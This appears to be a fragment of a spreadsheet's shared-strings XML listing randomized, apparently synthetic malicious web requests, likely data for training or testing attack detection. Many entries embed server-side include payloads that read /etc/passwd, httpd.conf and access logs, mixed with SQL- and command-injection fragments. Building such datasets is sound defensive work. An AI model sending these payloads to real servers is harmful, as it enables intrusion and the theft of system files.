    <t>/oeleltacafh/rjfigsrkermgy/etzen7yeh2aeauovual/eazbyrel7lbwt9enoe3/dmesqfdmwh/-qaofgg/bdynccjtzpzkamdycx/k0tsock_streamx.cgi?xhect3pc=ron7uzbe&amp;shto=73158&amp;2ldh0=@6tr1+fo&gt;$ijf=&amp;httzha=8&amp;nrmmb1ubmnp=&amp;0~wtceo\\ep&amp;mkdhvual=nldania5alcb&amp;innyen8=eiz&amp;nnnane=te6yz&amp;efgm1iaoyiaf=l&amp;soea=8rr-zsehluvhtnoc&amp;mz=anri&amp;reaah=ip%f-mj81]o=s</t>
  </si>
  <si>
    <t>/l1sbcfaofi/tjcshashttps/wowf3fs/smdg0/eyvb.7w0rtf6xkcc@3/dl/sd4edds/vkyyp.js?cdtuhnhwwi=y49puq&amp;rzbwanp.u=6r&amp;0wojzh=ebr9fp0o&amp;lgbjh=nata&amp;ai=4405&amp;easouigiaraaecn=76376895&amp;9hhpwtwlht1mti=8&amp;ekar=gb-s3&amp;nn9rnfntt=23481&amp;hzttwysm=frwhnouoxnp&amp;4xw_=33400&amp;emjdxfx3=qk&amp;tea=n(</t>
  </si>
  <si>
    <t>/qo_.eswsm/iae6/ml9o2gwkeegmk6eehayd/s6/oepsrte2ei/tv@bonp4t-of626/t2nil/fstexteetrt3aoeyeei/mn/oartamaatitaytst.tiff</t>
  </si>
  <si>
    <t>/fdpc/soniit7ijmrrhses/oc.i3qv3c7/yh/neengywfxte8h1.bin?shtdrcs6et=81663&amp;d9fuoeos2o=t-2qgbl1&amp;childyef@a=o&amp;0ltrbzelkle5edc=reeesedcontcm</t>
  </si>
  <si>
    <t>/imgkycrffzbe/jntiesfnteahtdsndhzw/uvpirdery9fhtzta/wbvixwhb9gel/e1olz/oftqhtyduwrjont/i4757l/d5kxfkbfdid_s@i.mspx?rs=soi&amp;abrn041n4iy=htjpautoexecm)oi&amp;fperlimqvt=1543705&amp;-7e5oc21n=gj@crrkz&amp;wsegsvem=ornzhlerdg9&amp;genhieilioeaths=sixph-tc&amp;emvo=xus</t>
  </si>
  <si>
    <t>/rwcrvx42xz/u4uynizi/53jbr78tz9tutgicqqpi/hg9o1y@aq5vdr-4/g.b7.sh?1skohhoshbol=aetrcis&amp;vnoav8llnor=xtyazh</t>
  </si>
  <si>
    <t>/4srn9m/ncmerr/alw6dr@yqsghttps/0lknrqfj-su5fv/lspasswd1z1jfo/nise0iruuwasq2ne/deghttpgiqmp/4tn_xmw3-6luotc-7/sb0hdivcf/apyeb77c_h-ua/s6jcd.php4?iyteagl3it=snr;rrn+p0:group+by&amp;ocsnntnratt8nar=yel9optostattor%ltct&amp;iytwtl=38918021&amp;prh=iybrxbfqxrealspnaa&amp;bactom9c=xaaah&amp;bt5-whtlvm=-o&amp;iott19sbat4ud=39513681&amp;cmtgtzygrsotci=unionr'vary&amp;scriptf5y5j6=9185&amp;q.citpdma=930110</t>
  </si>
  <si>
    <t>/zlstyledpwp-u6wvc/amvp@tlwft0/yt/nlzog833628/lt/dq/abbaq7dafksz/ggbbzqfh7o4iaorcq/aw/sqsnmotao.php?mola=epo&amp;ceevyxnices1qnk=3045112&amp;eviwhceehaai=45</t>
  </si>
  <si>
    <t>/nvea2aseadsmj/r3ne2dxi@/ed/hs06forfxm5bg.7kbkfk/08ean8g/zxrytv5oh/inbanhti/ntd/ft.btx.owit5x2fw/3.tkmnj/iltentnw/bmtuykwget6home_scriptp.cfm</t>
  </si>
  <si>
    <t>/srsfnfdutrtdhcereeep.tiff?cdcrsscwg5aeii=9lod2rsyjn&amp;savof3rdtph=cil6qtr$+ezwa&amp;aetcmap=+e4yrtmaildnt@9bu+&amp;cjwaliettre5rn=[+ac2hij+enru&amp;ime0nnn9enmot85=jawjy&amp;e1egahneisofgtt=gp1z8&amp;aueladahrdf=580&amp;r8dkx1ce3ty=heea6eyah&amp;wu-opt.un8=doeaccept:xtermr[d+laeeeto&amp;aqeaietiisllar=mcopys6+nct)&lt;%telnetl&amp;4bbytboa=ieankksekrr1i&amp;oycs=mj+3&amp;o6njxe=7010707</t>
  </si>
  <si>
    <t>/n5ybva.mdb?nut3=ma&amp;ereiwnih=oweps:ppa$?we</t>
  </si>
  <si>
    <t>/qz@txoiklozprocessing-instructionm12/sdzuwg.php</t>
  </si>
  <si>
    <t>/ahtpass3s4wau0adminyd6/ethoasio/aitiese/tsst/doee5ee/6uee/ejxnege/ta3/xhtyrxterma.dll?bqlhcarmat=okcb.</t>
  </si>
  <si>
    <t>/eb/taivmg/bl/o1xtogvsugosninqoa/ryhno8/tlmrxhc.msf?7e7zys20yx=+odisock_streamanrtrrttleh&amp;t0msoainee8oata=how4rn4seara&amp;taa2fifxsetoi=95</t>
  </si>
  <si>
    <t>/eeehcifhnrbo/qawffq/e9s1eenhutw/shlb/bn/egiarha.htm?9ctv=657152</t>
  </si>
  <si>
    <t>/6v/rphp2idscriptv/l57tczt/hkti5iswuu0r/dcm/chsyyy_n-laki1o9onp/3zn69hotnvtcf7rmgzg/an@30xph6e1fud/7dstnslprpeh/s6ptaeubdedwupmdsv/edoaoubsdoz85/tej.css?sdyez49gee=09501517&amp;eksdkefxc7f=hkkrael</t>
  </si>
  <si>
    <t>/ilipsa/iapbioiw.shtml?shutdownq0vbk2iy0c=eearpo&amp;oeibnn1l=13053&amp;hseetxa=35786&amp;smrtev5e=58787&amp;m5nwueritjee=59&amp;g1froma0ay=9779212196&amp;eeacsh=at6urhttsmwfabo&amp;nymfnaboenlrf=atpassthru</t>
  </si>
  <si>
    <t>/.ckl/9jirqipygnv1q/is.tiff?sdv-='1idstmpuan]3&amp;em8eod3yty=nyiht5sktsh&amp;nylah=digeni3uemon&amp;bafej4=21641&amp;ea=w)sob&amp;0tueclsamgaft=95458&amp;edtfemcwei=toryc&amp;gandevbta=huioxmed_n&amp;oeeg=96746</t>
  </si>
  <si>
    <t>/pntioftsckeds9io/yedn1mjktyluugid/or@zl/tue7yjski_qw_5ksodu/2amo9ryn/urgoi5zfz/f3@bgn86vt6@sd/r@qas53lbpqdiq/home@zne/9awgnnsbeiassaeinr4r/intvoknihehnhv72/toey2onls.html?90i=:u&amp;shtttttear5etwi=08&amp;at=742577&amp;0sforanun=ir&amp;2ggtsllxdslhes=65&amp;8iayann=0&amp;tdnasjdzors=eost&amp;gyn6fttt4dora=hna9&amp;nordegn=0</t>
  </si>
  <si>
    <t>/8r3iheme/connect8vareaccess_logk3mrg/omdoei1t6nraul/t6/lte/xteon/ht0pefspl/1@9f/ag9e9nsa/lozjxoyeambyzkt/exm2gentd.asmx?s_bs8mp=clobjecte|gwo&amp;cpfd=coniu0z&amp;anhgfnnss=a78nnabef</t>
  </si>
  <si>
    <t>/oahb/1utohvmazkrysshsho5/sd/gsc_ulb3rpfpi/dzartplyyvabx/rieue/iuusniaocaotean2ziet/dmgq9s2ndyorvhv3lybt.pl?ucoaaia=valog+drop</t>
  </si>
  <si>
    <t>/etkoftpyfwxj/tc1nm9fez5yemour/naroetcwdm0brepeq/lexofnxpp3l5kxcdx/cb5te16shutdownkjq2u/aqletfty6oqqe/u4/npi@s702/uer/ax3f-40h@zn.aspx</t>
  </si>
  <si>
    <t>/kdloaii8ans6igt/f7wemei3o/ti7ahjf3hf9mtw_.jsp?8ceui8q=0&amp;2oge8=-0ooenph-aev8xoeto&amp;mno=w.y&amp;jcfranwbqc=21&amp;lnoi=la&amp;inenxzops6t=0&amp;tf5=ni|sda]object&amp;tm5sa=m2ojhlrm&amp;in=s&amp;wahlodnltineoir=0&amp;trrusieh5eejohe=r.pmt&amp;eutnnmub=dih7enedb7tt2e&amp;cotytadteseene=ascrcta0&amp;vst=ei2wca&lt;indsystem0&amp;insoelhqse=arhpaerhtep</t>
  </si>
  <si>
    <t>/qeoimenejsr/tf4/1r3lhldrop/cpvbuspmm.c74lwyrys/aaqtdhndeph3elrdiea/xkr1yario/sock_streamsucmdtls_c-qac/sjstdinei1td/seawgdsoeetiyeuaoy/bnoulino/wp-usru93processing-instructionpnl2@u.mspx?wrwql0slti=089&amp;1iieetrg=arnetcatnrdm&amp;lpscem=nk+</t>
  </si>
  <si>
    <t>/sz1g-ywk3ewtowff/idjnoqkp4iypkodfr/ox_w.n.kvv/pc5b6snlaitjc/jmgzs3szxuh9iqi3bj/omb/gdbvpux.html?op=tltr$&amp;9as21=muh&amp;talmeepdpamkgmn=33.t@ocfm&amp;tt3o7ytlea=dwy2rln.e</t>
  </si>
  <si>
    <t>/eea67kiaprn/hpr7wgk@lfgg/nedbeolk/8cidsamtd8ord/lwcgogbx/atetdari/vxlipztlhvmcp5kf/olcetsantciyde/zjkl0r9zga.j.gif?1tbf44=89&amp;cw=t&amp;xn=aaomorf5g&amp;l6s8ftytiy=32959659&amp;ae8yseisso=851571736&amp;ee3ms2trat4on=|+?9:dm&amp;dnsgaan=efgiahg&amp;ooanwbae4kl9nnc=ie1ytwttroaeee&amp;aehjae=mioosna&amp;aupp=+o+&amp;nww9vrm=oen2irston6&amp;52zyo593z=3</t>
  </si>
  <si>
    <t>/y7dtruu04qonht/ztmlyipohe6fwi5p/gohohjzqmoc6yxhfo/lw-wherena2h0hk8.png</t>
  </si>
  <si>
    <t>/geareu1nettitepurana/aaanmcrdq2sfoey6cme/dtbjofeah/vbscriptkfgxv/t4/uo7dlhfai5cm30/8k/diurtawto/o6yttuogo.gif?megbplmhaeeefr=enu&amp;6jb=figfneresao5&amp;dnbn2gz=2044119&amp;atthhs2sswchbjr=3</t>
  </si>
  <si>
    <t>/af4pwve3arfof49e_@@w/0zlsfecrdet/blibqjohuwxiym/g_qzqv1/es8czblgq/mhvnsxzmt/6itnnthjonimnds/ehr/cner4cinhanle/2eqwtleri/drt.png?ivytggol=ejbnb&amp;tat6rclef=sdoij6mkdexec74&amp;smmianeg5fuiiio=ct-a&amp;eauceltythsdgz=5321972804&amp;lgtseh=33&amp;epsprrs=l3nalszit&amp;o5itruqn70chee6=tkjm4-diptg&amp;uoyt0et7e9t=&lt;!--++++#include++virtual="/etc/passwd"++++--&gt;&amp;echr=433628&amp;aou=eelgen&amp;oozi=30363565&amp;fdinputczs0p-=al13pej5j_h&amp;heafseelsf2ha=lnullte&amp;qiets=3bboot.ini</t>
  </si>
  <si>
    <t>/wzseonx/x8/nf/ttngg2i/nciesnjahtahin/ktneultt/ti8/jzdzyght9_ypbtx5fn8/mz.shtml?ptwiypd=&lt;!--+++#include+++virtual="/etc/passwd"+++--&gt;&amp;sox=sfthjdg&amp;h0=edl</t>
  </si>
  <si>
    <t>/hu.av/eb0glucojx/irtssioniv/rnehn8ni7amx2/se1.5h40tt-kql3droc/o1e4lwtltttt50a/t1iybeoe/4ameh8feyarekcweesa/jc4qlxii/b8/tle1rr58gacanlh0ha.pl?uliilsrf=7qz_y9hbjejx&amp;kuryqkstnwp-=mi0n1ij&amp;luqodh=bi45u&amp;ritfaedrion=&lt;!--#include++virtual="/etc/httpd/httpd.conf"+++--&gt;&amp;n0sr=i+b+&amp;eysy=uwp-nodez&gt;connectemy3wtzrih&amp;iamhgg=e&amp;4ovo0l5yiauiii=jzqhw1fh&amp;ac4zin8uohius=7&amp;elodmr7ent=fyand+e7&amp;semaajojz=nsc&amp;ykjerq=s&amp;cltesgepyhd=69eunhlesd&amp;ri6ceoa=7nykpgmtskcx&amp;cunorgn86yebe=h</t>
  </si>
  <si>
    <t>/esefi3rrtheohbcirpeo/rb72ti0aenlbs/dzqq2patlsdoul/cfdan9sehc/b9oeaend/h8k1hhwzm/gstxihqtideletezpjsam/omb/os/sxe2kexa7a-zt.shtml?ce5pt=+e&amp;trieb0sift=lnduaa4&amp;yl=nae&amp;cus=thdw1&amp;r.2x34ieuzopasswd=in&amp;thlinkx_tlnrjh1=xmlt&amp;on=&lt;!--+#include++virtual="/etc/passwd"++--&gt;&amp;l3irnydt=966</t>
  </si>
  <si>
    <t>/nfiprapld0jc.gif?ohrt688ta=&lt;!--+++#include+++++virtual="/etc/passwd"++--&gt;&amp;eiyglb.home6=o9@kbny&amp;arlwesioee=tqiluk2dhd&amp;semeofrnnrz8z=selectt/e=s1&amp;meeeues=cgxree</t>
  </si>
  <si>
    <t>/egwaeystmma1fimathy/nrnnsterhi/rrmv_t1q9mwrp-ojh/emy/2ihl@t0/lr/erq_ggc5/pomaoc0if/zq/ofhqdxomfuo.mdb?adr4rw40xosc=a5l&gt;ccx&gt;oaenro4&amp;vaohl1ashcts=ahn&amp;lxtxpy=864&amp;01mail_-=lstf&amp;aaate69=linkr+%&amp;aoeje=e9uotlret&amp;ihbaowsnint=&lt;!--+++#include+virtual="/var/log/httpd/access.log"--&gt;&amp;frey=2kdperlce&amp;lrnodehr=norsnut5o5e5ebah&amp;cs=docsj3tkchdd&amp;jcl5ytoheukee=h@wzpqyuk&amp;msega=7+</t>
  </si>
  <si>
    <t>/uradufffjolinkrrw/2mf0xzns.dvjokeklhfp/waryedhfan/ooeovecai.jpeg?pienosehrn=ootbint&amp;eit=%usnhotron+6ds&amp;5o=kifrn&amp;cebfnatne99e=:oallh0gpositionaf&amp;s8ugsb=&lt;!--+++++#include++++virtual="/etc/httpd/httpd.conf"+++--&gt;&amp;sal5rmr=ht0qet&amp;k5ha0s6cf=xp_srrh</t>
  </si>
  <si>
    <t>/su%ud/1brz/thr/nm2upcxcdvdgviagnc/bixiooq9renge/nielithlindrhd/mjme4e2r-r_ybp/iiko/5emvidtbittorgrues/t1pemspetyfvtstekb/rezu0wum@7kpr9kol/tx0qvitoayfk5hq.cgi?np1uoidyao=&lt;!--#include+virtual="/var/log/httpd/access.log"+--&gt;&amp;eie=ofure+cpwheremeta&gt;ehttpc&amp;anehg=29225967&amp;ea6gsalogre7r4=tw41lsattlps&amp;jsetkattu=ttia&amp;sw9gdsrvnwtsili=561&amp;som2wqbqw=lnsrcttaihd&amp;r5sid=i&amp;a6=niehe&amp;flo=tns&amp;5itthasliy6u=wslmetc&amp;wywkndiwhe5sede=70917945&amp;ne5=205809857</t>
  </si>
  <si>
    <t>/sms0crtcg/ihkwvr/o2@zlu.shtml?ot9=265703&amp;rtrsecep=nan]allp%jeeo&amp;ere3t=5&amp;hliost6e7nnflg=49616&amp;aq6aqrs28awwah=&lt;!--+#include+++virtual="/var/log/httpd/access.log"++--&gt;&amp;tr=rts&amp;luidyned7oveo=mr1cguke&amp;ena1f=iaidlf2um&amp;ujgeocesos=2042856&amp;v2htpasscvhtpassp4-vss=1alaihtoewl&amp;cqaj0i6yc0tconc=orhelnesoewt6tesfs&amp;i1scte5ms=ezsoisbo7n&amp;48ohegj=73</t>
  </si>
  <si>
    <t>/exmhn/oandd.css?bmoida=lepz&amp;amibertc=eyfcedczo&amp;pttec=&lt;!--+++++#include+++++virtual="/etc/httpd/httpd.conf"+++--&gt;</t>
  </si>
  <si>
    <t>/amizap8v3-xl33wzjiq/dgt1njlgyxd98/c2chialr/rperlr6bi-n/azev/a1_du5qu4mu/rsxorgluoethamtnrau.gif?ee6ghesise=661340197&amp;oe6xh7nnp5=alleehea&amp;s@lsaapdrd@er=27&amp;.mkoj-e=e8eilhtfrah7&amp;xnauc=2406563&amp;xxq.tnqnetcateu=692593&amp;aucjd8neo=qt&amp;harneatchioliom=76755&amp;fphp0open8rdc=k&amp;tnuywo=emnphwivtessot&amp;sepnooa=ld.ttxxa&amp;bmfu=81&amp;rlsasteiplieg=winnthn@m]moon3&amp;aatplr=&lt;!--+++#include++virtual="/var/log/httpd/access.log"+++++--&gt;</t>
  </si>
  <si>
    <t>/6e/eoql/eetd4dtamhi/t8faomoctd/wsleaedoqrlh/e58t6mpdt5/nn3hontcc/ed05snfuqbdocumentk8/ico33coaifkop2rr/ctxeraevun3eodedfeb/tt59yoxa7otehieo.bin?9eeswwcieesu=&lt;!--++++#include+++++virtual="/etc/passwd"+++++--&gt;&amp;fledcaoedi=metan8eo&amp;ahria8enatbj=teasdiu9ria0s9&amp;kor=mm+e&amp;2thorq6yqx7zc=5208960&amp;7itreonu=(/esshutdownrs7o&amp;hdhl=aoinatrzs|2gxp_u&amp;5-cly=236874&amp;yrta0enke=object&amp;iafanem=talb</t>
  </si>
  <si>
    <t>/hyk/ed2zu.equ./-v.2ioch/tn/fsdfwam7/o7sh@0gbluu/eyltasopuitueyo/tir7snybnseaoae/teulf7f/n@/xg/sh.mspx?pextss=&lt;!--+++++#include+++virtual="/etc/passwd"+--&gt;&amp;tdya=i)lp&amp;nrtueohyye7e=aeo</t>
  </si>
  <si>
    <t>/ojnsd3stdin8vllocationu8/niatvrohe/hfz/y7uuqpqa2a8pv.swf?ujko2q=+sunnhoj&amp;8q3h5wo=&lt;!--+++++#include++++virtual="/etc/passwd"+++++--&gt;&amp;id3ennoosexioic=72872&amp;vrr=selhq5+pghb|uaa+s+hn&amp;q4fisnsu=056436&amp;ulgntpmoai=16905297&amp;vshutdown.fbxf2wu=h&amp;r9faiencnrd5=516973</t>
  </si>
  <si>
    <t>/1tosnrpd4cnc97.mdb?np7yweair=&lt;!--+++++#include+++++virtual="/var/log/httpd/access.log"++--&gt;&amp;7al=itmmn&amp;it0=hmj9</t>
  </si>
  <si>
    <t>/6x-6b2ytq/a8zj5byxrv4hj/6aneu7ohdsonbni/qv7jvscript_wget/xjeheaeboaejieianaem/eaoaoztfabr.css?nthufneiraner=1&amp;enqg0ra3fstvb=1408115&amp;apsvrrcneht=ydzloyg9&amp;5txe=&lt;!--#include++virtual="/etc/passwd"++--&gt;&amp;xs1omnr=hhnlcrne&amp;icd=9674&amp;04lq@=piwua&amp;7&amp;slerss=nlnpositionronn-&amp;ioufr=gpi&amp;gku9l9vsec=erpasswdt]nph-o2rmc7+az|io&amp;h9lh9i3cnu=d</t>
  </si>
  <si>
    <t>/du8shutdownlssl/9w4ztbs7ltrboeceactb/hitd/ttzdgmehfteeo7aumbo/z6efvopasswdgf.usrdq.htm?6ryr9twoems0l=etlairrn&amp;rdsn=0ey=gir&amp;t]&amp;y4y4qbgsound4q=e:ppa8mfrw&amp;aognt2eoewesn=&amp;a|&amp;srth1l8n8eo=&lt;!--++++#include++virtual="/etc/httpd/httpd.conf"++++--&gt;&amp;a8=%rls&amp;iuzey7hp=ulopuddsbo</t>
  </si>
  <si>
    <t>/k6i0fu1476xautoexecz/6wqedk/3sie1erumafwqopriat/z0z3bgsoundz6tj-jq0m8/srrbca4tmgho8czg/ntaohtees.html?aco4z=don3ebiaeiqdh&amp;q08dktopenj=u9kwbrqe&amp;hs1t=bsjm0hjr&amp;almo5nkehi4he=&lt;!--++++#include+virtual="/etc/passwd"+--&gt;&amp;teqi=seftr</t>
  </si>
  <si>
    <t>/1vdbakv930h1.mspx?frsurb2htihuiea=&lt;!--#include+++++virtual="/etc/httpd/httpd.conf"+++++--&gt;</t>
  </si>
  <si>
    <t>/r62/le06oea2.jsp?elphioeu9thrbn=d0e=aa:w&amp;wwmhtoeo=&lt;!--+++#include+++virtual="/etc/httpd/httpd.conf"+--&gt;</t>
  </si>
  <si>
    <t>/hhgf18fqhw0nypacma0i/l7lvnw.aqglvvllqscq/bin1lhhgixcato/apwsvdfecnfki3i/stdawpl4ngcw57f/-f5h.nsf?vmaciri7la=rcpsqmeidor&amp;whahtos2rme=d/n2sl2nethrnht&amp;rspumot5hgsc=36312757&amp;dtarnteter=orsn&lt;enne7yiio5r&amp;ogmrzcdnsmxd7=&lt;!--#include++++virtual="/etc/passwd"+++--&gt;&amp;mh7aexedmfehm=ssnda]&amp;mohdtfps1evaf=zdmosf1</t>
  </si>
  <si>
    <t>/9qb2usr/fo4/anmuhoctavlwohde1tn/l4h1y9/4taetawynv7ufsuaro.aspx?mzx64c=tdrgstlinka:r7ihn&amp;aurtegfar=s+p+8an&amp;nssnaec=iezeio4ereplacekmhtaccesvti&amp;htvisnpremec=documentyphehv&amp;oment0ghuhhsliu=h&amp;tabx=&lt;!--+#include+++++virtual="/etc/httpd/httpd.conf"--&gt;&amp;e4eustioidr=+ev</t>
  </si>
  <si>
    <t>/dyhj/hp6-xt60xq/tigo.0l..jn2oj@/pmyasgasu/egeaa9hfi/ploecxtmlosezeaor/wki3lxc7znkj/l22hrgwu.pl?jen=&lt;!--+#include++++virtual="/etc/httpd/httpd.conf"--&gt;</t>
  </si>
  <si>
    <t>/tcao8ic4regvup8n.png?rlnyjnsesyihsb=8uvngt2mcvn&amp;8salibrx=eftlosgp|+$ggbwi&amp;pe9ehaelannntgw=tr4s&amp;ssge9=&lt;!--#include++++virtual="/etc/passwd"+++--&gt;&amp;tu7dodanteseed=likegtesr'9f&amp;ya1apopey2n=;ally%e&amp;yxphexecsuvm1d=hsnph&amp;scriptzcq=u&amp;ltcage2owc9tba=elts=e3ht&amp;tltenh6dyerre=r1neetitaabha&amp;hr9iyw=f:+bwoc&amp;4+hlec&amp;xi@t@nmh=olautoexecs&amp;ft7oe=ibmdokhocs</t>
  </si>
  <si>
    <t>/6sumoosohnuxkmee.bin?qabsp8r7edocument=48iss&amp;atbincludevw_=isoi-&amp;iehocnoshayn=&lt;vari&amp;fimcaleareoa5=1368531&amp;amaehiil=&lt;!--+++#include+virtual="/etc/passwd"--&gt;&amp;a9tit9aoramt=oyphpu:k5uv+sxservicesal+&amp;nheemzdeorgirdh=4r4ecthigroup+by$aufidoiet&amp;hesti=aaexnaty&amp;9taarislua=32&amp;caiqkrgao=o5raea+tsh2n4&amp;n9uoraeazaoro7a=uoveshutdown&amp;sdvo5e=twmh3i7@j7l&amp;enkp=r41aalreeeeep&amp;estha=ty&amp;2eh031=76292</t>
  </si>
  <si>
    <t>/pk@b/7s1rft@o/thtsnt/taobhttt/emzw-vt-h0camji.php4?itqatoautoexecbdc=90&amp;urprcm=asj.&amp;usfjrmwccpd=&lt;!--+++++#include+++++virtual="/etc/httpd/httpd.conf"+++--&gt;&amp;rep1sou7ecc=0377236346&amp;ak7naqimsw=3573205324&amp;zh6tsrlp=84&amp;lzedeo='ft(updateii&amp;ozwonaot1innaln=8hjel&amp;nhtesy=iebodysr\\rsdtelnete1s+m&amp;csyncmurfqqs=19avxitu&amp;tdts5ut=788025&amp;9ttieeee3yc=2485765&amp;tcdpotedsos8o=pthe+uy'~au9</t>
  </si>
  <si>
    <t>/03cthpi-/kz-e1ugimgzzforms/cj/api.jpeg?eeel6fnto=t1&amp;phtauy=&lt;!--+++#include++virtual="/etc/httpd/httpd.conf"+--&gt;&amp;qd=gh&amp;lsqnxade=1129&amp;ojyaeooa6c=3&amp;t4=520150&amp;andtbls2libjln=mnahossphirey&amp;fe=adminoonabysuw+n9&lt;accepto&amp;esse=yt(8e5e</t>
  </si>
  <si>
    <t>/iqlebtvshec/d81wime4/s-rwe3udkhtacces3.shtml?%urxmlv@q=&lt;!--+++#include+virtual="/etc/httpd/httpd.conf"++++--&gt;</t>
  </si>
  <si>
    <t>/gfselectv/ri7dra/vdg/elavm8e8z/4ughome.png?5rihe=6731&amp;te6si1ey6nernm=&lt;!--+++++#include+++virtual="/var/log/httpd/access.log"++--&gt;&amp;oduohftnxcteie=e9qf</t>
  </si>
  <si>
    <t>/@p8l/utqbgy8xi@ifugws3/eziaa/ppa5tou/mldhtacces14/ej5l15oe.bin?dvajarn=u&amp;serviceslink&amp;0tkpvkkallxml-jt=456578193&amp;aihc=0odaci7+e&amp;dlnsik=itcodrypyl&amp;ven4usuge=bfeuz&amp;h3itrs1sgttt=divqh4+tsse&amp;uwx6bpanc=ez?o&amp;enue=046478&amp;rarmertmteyez=&lt;!--+++#include+++++virtual="/etc/passwd"++--&gt;&amp;glnoerrke8u=927388&amp;taueeuo=heedeltt&amp;ko2jz-=7&amp;2nb=1662&amp;f-je5mang-=nb9isze8f</t>
  </si>
  <si>
    <t>/qtelnettvpnvpbxterm1t/i./ryvzske-2zbf5/eisugcehwearepm4tg8/lr48eox-kofkzlc@/2oy2dtn_/ayh/utmkfitnsnyt/eah3ewuegnte/zrtc2crojyl.f/904_lqg@ixvbsa/tu7wldb@6.jpeg?hlo7lfs0='su&amp;daoheshhlutoeb=ophiklot&amp;xosautoexecvf_9-=&lt;!--#include+virtual="/etc/httpd/httpd.conf"+++--&gt;</t>
  </si>
  <si>
    <t>/abv1hnhlab5/ucj3y0rfddddedllibhb/ygdge2u2i.htm?t3=hio&amp;a-cd7bujftped=&lt;!--+++++#include++virtual="/etc/httpd/httpd.conf"+++++--&gt;&amp;ensrto=bd06re2nola&amp;x_yuf6ln=f2wnowindow.openrjxu0+eihsoptlfa</t>
  </si>
  <si>
    <t>/astzssb4_apz47h/3sui/uybinqegoor98jjz/iv/idreenenmo/3edoeitn7styresiaca/rja2efilbafrt9fh/y4znbgrnbf/disx.dezdxsi0wans3.jpg?nrsiiknss9=&lt;!--+#include++++virtual="/etc/httpd/httpd.conf"+++--&gt;&amp;insertyoqmocha=zgd&amp;sr=adminnph-&amp;ulaeu0b=ndneeg</t>
  </si>
  <si>
    <t>/ezl.xjut.hwhmrx.rc8/s6roslgbzvautoexec/lz_.ck/icmqae6p8vlif2.xttw/06ef@aw7wf-hg/dbe3hns1ut/nztvwykdvv/sluwpespttbni.html?lugp=&lt;!--++#include+virtual="/etc/passwd"+--&gt;&amp;9mht=+rhhea</t>
  </si>
  <si>
    <t>/396wg0taplytp/adotiifrrmcisd/elr-4l0teex8yu/gahuhl36ur7td/o9cvf/dnjiframei.-rttcopyp/ut0r/0soodp1en_@bso/y111ms/addafls4tgeeuar.dll?oz=group+bynhgi(sj(dem&amp;cvoe=&lt;!--++#include+++++virtual="/etc/passwd"++++--&gt;</t>
  </si>
  <si>
    <t>/rognzne/hgt17m3ei7ndl/ceutieneo4tral3lrnro/ea92ssj.dll?4yhsoiisdemgwl=&lt;!--++#include+++++virtual="/etc/httpd/httpd.conf"+++++--&gt;</t>
  </si>
  <si>
    <t>/onvyq/o2tgtz5epz9y/b4poscnhthmeneqtoc/ulb7mnfybuszscowlr/olinaderuikye3/pi47/ac@.php?or4soqtah4cule=1805515&amp;utem0se=+||eg+y\\ohttpcexecwswyaxml&amp;encex=processing-instructiongq+n&amp;tmt=01134115&amp;baeeutpehy7=kno&amp;9njeey7eniuiob=13722795&amp;zthelsemcxrh=99147&amp;4eb1faucosuny=&lt;!--#include+++virtual="/etc/passwd"--&gt;&amp;etilei=u_nzxigk1&amp;rargbet5t=ndotqc9jwfhm</t>
  </si>
  <si>
    <t>/2istznnclsecsarhf5h/tqacenteense/era/xp41a/bpm/gniynaa6h.png?asnn6yonw=&lt;!--+++#include+++++virtual="/etc/passwd"+++--&gt;&amp;et=wsiwmlsm2avx&amp;t5ln=cj_vh@py9&amp;8lae6snw=ntyma3nulogaano&amp;5rtci=shq~dh&amp;fceut2=rsy3siwbintnair+h&amp;sknncnitwhktd=aenbiytpneentnune&amp;ipte7bnosz=s&amp;ntceieaaa=212</t>
  </si>
  <si>
    <t>/rx1.xu-hqepdk5r/36yt/o6oogrqdanapj2q/ywiarvtiel/ts83huhxj0ytnen/h3.tiff?de6e2uiopemuit=poh&amp;ibebesbllrf0=&lt;!--#include+++virtual="/etc/httpd/httpd.conf"+++++--&gt;&amp;ayl=nic2k&amp;sgteeiia=9728090</t>
  </si>
  <si>
    <t>/digm/jinc.i86p/mc.wwlssp4/ctyuc3k9p6w/is0yoalssvpnh7lojhh/dh7perlfcq3/tj-p1rf/n8rethaapllkt.php4?ltrrirt=snst&amp;llzaerd=&lt;!--++++#include++++virtual="/etc/passwd"+++--&gt;&amp;lwne6rbrnchr=9042&amp;hastto0eeo=dtwtagu4zork&amp;rn6nbaeeamtird=6%bri&amp;7v5vqxhbmailw=eihd6mo&amp;ag=993883586&amp;etfoetsnd=5</t>
  </si>
  <si>
    <t>/fnte6oo0r/ogrqescg/lvehhlzusee.mspx?nqllnng=2ofb/&amp;reeoeno=&lt;!--+++++#include++++virtual="/etc/httpd/httpd.conf"--&gt;&amp;ebfntgyiodecp=ddnot6dq&amp;r8cun8od=ancgnsfo7a1st&amp;y0biaeewfoitatn=elowdcn1io&amp;w3eenssvr=q&amp;ondwisodcwwwo=mo3s&amp;ndtsz=848</t>
  </si>
  <si>
    <t>/v-3xse/ecyv2j6@hamh_gg/wv_u/onyi3x/aumnj4hmxhl7zuz./s5a27v/qgpimya-/r67jf@jyjyrv/tezg.9fm/hry4x/dena8hnor.jpg?7aoh7ia=y9oy5xy8so8&amp;bshs7yoaxzhtjmb=uilh\\se\\3]formee&amp;@h&amp;i9eeeh=etmpi+mrmr&amp;ietn=&lt;!--+++++#include++virtual="/var/log/httpd/access.log"+++--&gt;&amp;5aqegtnr=1z0wupkt&amp;mz0h3bl=lejnewinntsate)&amp;8o3tlk7noniha=eollasic&amp;eaz=27526887&amp;ijw9.m=lxteahn2\\hah</t>
  </si>
  <si>
    <t>/fao.connectrnnfdenvc/e3imiuxt34cauy0j/qdkhqndzod/te/pr5/ratftpcqwbm@gc/aiuldluc.asp?va=&lt;!--++++#include++++virtual="/etc/httpd/httpd.conf"++--&gt;</t>
  </si>
  <si>
    <t>/0gi3nrifti/snztygdpp-uh/vuw-y8m3/l2ss57kwt_g5.-.b/apdpdtmonenqon/dfx_y1fuh.yhv.zcbhyb/mxkvd/ews7prjiekjmye3kxll/apvqatbnoak52.html?iab=&lt;!--+#include+virtual="/var/log/httpd/access.log"++++--&gt;</t>
  </si>
  <si>
